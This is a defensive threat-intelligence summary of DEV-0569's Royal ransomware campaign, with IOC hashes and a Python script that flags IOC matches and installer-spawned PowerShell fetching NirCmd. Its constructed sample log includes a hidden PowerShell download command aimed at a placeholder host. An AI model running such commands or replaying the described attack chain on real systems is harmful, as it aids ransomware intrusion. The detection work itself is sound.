Analysis
On 17 November 2022, Microsoft Security Threat Intelligence (MSTIC) published a blog post on the threat group DEV-0569 finding new ways to deliver Royal ransomware.
The threat group gains initial access through malicious links delivered via phishing, malvertising, blog comments, contact forms, and fake installers. The links lead to sites that serve malicious software posing as legitimate software; the downloads are signed MSI or VHD files (BATLOADER), which then execute PowerShell or batch scripts for discovery, disabling antivirus, and delivery of additional payloads.
The installers launch a PowerShell script that downloads the NirCmd utility, which allows the attacker to elevate privileges and deliver additional executables such as the Gozi trojan and the Vidar stealer (which used Telegram to receive command-and-control information). The threat group then stages and executes Royal ransomware.
Prevention
- Use antivirus and EDR on all endpoints.
- Take regular backups of end devices to reduce the impact.
Detection
Create rules in the SIEM (Security Information and Event Management) tool based on the known indicators of the threat group to detect threat activity.
Indicators of Compromise (IOCs) of Royal Ransomware
• 2598e8adb87976abe48f0eba4bbb9a7cb69439e0c133b21aee3845dfccf3fb8f
• 9db958bc5b4a21340ceeeb8c36873aa6bd02a460e688de56ccbba945384b1926
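As an added example (not from the page's author or from Microsoft), the following script shows what such SIEM rules look like in code: it scans endpoint process-creation events for the two Royal SHA-256 hashes listed above and for the behaviour described in the analysis (an MSI installer spawning a script host that fetches NirCmd). The log lines and their field names (host, parent, image, cmd, sha256) are constructed for the example and do not correspond to any particular EDR product.

```python
import json

# SHA-256 IOCs quoted on this page (Royal ransomware samples)
ROYAL_IOC_SHA256 = {
    "2598e8adb87976abe48f0eba4bbb9a7cb69439e0c133b21aee3845dfccf3fb8f",
    "9db958bc5b4a21340ceeeb8c36873aa6bd02a460e688de56ccbba945384b1926",
}

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed sample: one JSON process-creation event per line.
# Hashes marked "constructed-*" are placeholders, not real samples.
SAMPLE_EVENTS = """\
{"host":"ws01","parent":"explorer.exe","image":"msiexec.exe","cmd":"msiexec /i Setup.msi","sha256":"constructed-1"}
{"host":"ws01","parent":"msiexec.exe","image":"powershell.exe","cmd":"powershell -w hidden -c iwr http://example.invalid/nircmd.exe -o nircmd.exe","sha256":"constructed-2"}
{"host":"ws02","parent":"services.exe","image":"svchost.exe","cmd":"svchost.exe -k netsvcs","sha256":"constructed-3"}
{"host":"ws03","parent":"cmd.exe","image":"royal.exe","cmd":"royal.exe -id 1234","sha256":"2598e8adb87976abe48f0eba4bbb9a7cb69439e0c133b21aee3845dfccf3fb8f"}
"""


def classify(event):
    """Return the names of the rules this event triggers (empty list if none)."""
    hits = []
    if event.get("sha256", "").lower() in ROYAL_IOC_SHA256:
        hits.append("ioc_hash_match")
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("cmd", "").lower()
    # MSI installer launching PowerShell/cmd: the BATLOADER stage described above
    if parent == "msiexec.exe" and image in SCRIPT_HOSTS:
        hits.append("installer_spawns_script_host")
    # Script host pulling down the NirCmd utility used for privilege elevation
    if image in SCRIPT_HOSTS and "nircmd" in cmd:
        hits.append("script_host_fetches_nircmd")
    return hits


def scan(log_text):
    """Parse one JSON event per line; malformed lines are skipped, not fatal."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        for rule in classify(event):
            alerts.append((lineno, event.get("host"), rule))
    return alerts


if __name__ == "__main__":
    for lineno, host, rule in scan(SAMPLE_EVENTS):
        print(f"line {lineno} host={host} rule={rule}")
```

Hash matching alone only catches the two known samples; the two behavioural rules are what catch a re-packed installer with a fresh hash.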
References
Microsoft Security
Fortinet